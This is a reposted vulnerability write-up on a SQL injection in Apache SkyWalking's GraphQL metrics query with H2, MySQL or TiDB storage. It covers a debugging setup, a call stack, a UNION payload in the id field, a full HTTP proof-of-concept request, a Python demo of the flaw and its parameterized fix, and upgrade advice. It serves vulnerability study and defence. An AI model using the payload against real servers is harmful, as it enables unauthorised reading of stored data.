skywalking remote debugging: Apache SkyWalking SQL injection


Reposted from the blog: https://blog.csdn.net/caiqiiqi/article/details/107857173

References:

  • https://www.openwall.com/lists/oss-security/2020/06/15/1
  • https://mp.weixin.qq.com/s/91MWSDYkom2Z8EVYSY37Qw
  • http://www.h2database.com/html/functions.html#h2version
  • https://s.tencent.com/research/bsafe/1011.html
  • https://blog.csdn.net/smooth00/article/details/96479544

Pre-built 6.5.0 release:

wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz
cd apache-skywalking-apm-bin/bin
vi oapService.sh

Add the debug options:

DEBUG_OPTIONS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=12346"

Then start it:

./startup.sh

The process is now listening on port 12346.

Download the 6.5.0 source (https://www.apache.org/dyn/closer.cgi/skywalking/6.5.0/apache-skywalking-apm-6.5.0-src.tgz)

Import it into IDEA, add a Remote run configuration, and set the module classpath to oap-server.

Vulnerability description:

When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.

Affected versions:
6.0.0-6.6.0, 7.0.0

It only worked after I switched H2 to TCP mode; the default H2 is in-memory, the table was not found, and the query failed. Edit application.yml.


Debugging shows that the id parameter is concatenated directly into the SQL statement:


So a payload is constructed for the id parameter:

id: \"') UNION SELECT 1,CONCAT('~', H2VERSION(), '~')--\"

Because the WHERE clause has already been closed by the payload, a UNION injection can be used, and the trailing -- comments out the rest of the statement.
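As an added illustration (not SkyWalking's own code), the concatenation defect beside its parameterized fix, using Python's sqlite3 as a stand-in for the H2 JDBC client; the table all_p99, its two sample rows and the probe id are constructed here.

```python
import sqlite3

# Constructed sample rows standing in for a SkyWalking metrics table (all_p99).
SAMPLE_ROWS = [("service_1", 120), ("service_2", 95)]

# An id in the shape the post describes: it closes the quote and the IN (...)
# list, appends a UNION, and comments out the rest of the statement.
# Constructed for this demo; it selects a constant, not H2VERSION().
PROBE_ID = "') UNION SELECT 'injected', 0 --"


def make_db():
    """In-memory database with one metrics table, so the demo runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE all_p99 (id TEXT, value INTEGER)")
    conn.executemany("INSERT INTO all_p99 VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_query(conn, metric_id):
    """The flawed pattern: the id is spliced into the SQL text, so a quote
    inside it is parsed as SQL rather than treated as data."""
    sql = "SELECT id, value FROM all_p99 WHERE id IN ('" + metric_id + "')"
    return conn.execute(sql).fetchall()


def fixed_query(conn, metric_id):
    """The hardened pattern: a placeholder keeps the id a string value no
    matter what it contains (PreparedStatement.setString in JDBC)."""
    sql = "SELECT id, value FROM all_p99 WHERE id IN (?)"
    return conn.execute(sql, (metric_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_query(db, PROBE_ID))  # one injected row
    print("fixed:     ", fixed_query(db, PROBE_ID))       # [] - no such id
```

With the placeholder version, the same probe id simply matches no row; the UNION never reaches the SQL parser.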

Demo (screenshot not reproduced).

Call stack:

executeQuery:106, JDBCHikariCPClient (org.apache.skywalking.oap.server.library.client.jdbc.hikaricp)
getLinearIntValues:117, H2MetricsQueryDAO (org.apache.skywalking.oap.server.storage.plugin.jdbc.h2.dao)
getLinearIntValues:96, MetricQueryService (org.apache.skywalking.oap.server.core.query)
getLinearIntValues:60, MetricQuery (org.apache.skywalking.oap.query.graphql.resolver)
invoke:-1, MetricQueryMethodAccess (org.apache.skywalking.oap.query.graphql.resolver)
get:147, MethodFieldResolverDataFetcher (com.coxautodev.graphql.tools)
fetchField:227, ExecutionStrategy (graphql.execution)
resolveField:170, ExecutionStrategy (graphql.execution)
execute:59, AsyncExecutionStrategy (graphql.execution)
executeOperation:158, Execution (graphql.execution)
execute:100, Execution (graphql.execution)
execute:558, GraphQL (graphql)
parseValidateAndExecute:500, GraphQL (graphql)
executeAsync:470, GraphQL (graphql)
execute:401, GraphQL (graphql)
execute:87, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:81, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:54, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:707, HttpServlet (javax.servlet.http)
service:101, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:790, HttpServlet (javax.servlet.http)
service:105, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
handle:841, ServletHolder (org.eclipse.jetty.servlet)
doHandle:543, ServletHandler (org.eclipse.jetty.servlet)
nextHandle:188, ScopedHandler (org.eclipse.jetty.server.handler)
doHandle:1239, ContextHandler (org.eclipse.jetty.server.handler)
nextScope:168, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:481, ServletHandler (org.eclipse.jetty.servlet)
nextScope:166, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:1141, ContextHandler (org.eclipse.jetty.server.handler)
handle:141, ScopedHandler (org.eclipse.jetty.server.handler)
handle:132, HandlerWrapper (org.eclipse.jetty.server.handler)
handle:564, Server (org.eclipse.jetty.server)
handle:320, HttpChannel (org.eclipse.jetty.server)
onFillable:251, HttpConnection (org.eclipse.jetty.server)
succeeded:279, AbstractConnection$ReadCallback (org.eclipse.jetty.io)
fillable:110, FillInterest (org.eclipse.jetty.io)
run:124, ChannelEndPoint$2 (org.eclipse.jetty.io)
runJob:672, QueuedThreadPool (org.eclipse.jetty.util.thread)
run:590, QueuedThreadPool$2 (org.eclipse.jetty.util.thread)
run:748, Thread (java.lang)

PoC:

POST /graphql HTTP/1.1
Host: cqq.com:8080
Content-Type: application/json;charset=utf-8
Content-Length: 313
Connection: close

{"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \"all_p99\", id: \"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\" }, duration: $duration) {  values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}

Remediation:
Upgrade Apache SkyWalking to version 8.0; releases: https://github.com/apache/skywalking/releases

If upgrading is not possible yet, as a mitigation do not expose the Apache SkyWalking GraphQL interface to the public internet, or put an authentication layer in front of the GraphQL interface.

CVE-2020-13921

Only when using H2/MySQL/TiDB as Apache SkyWalking storage, there is a SQL injection vulnerability in the wildcard query cases.

Reference:
https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E

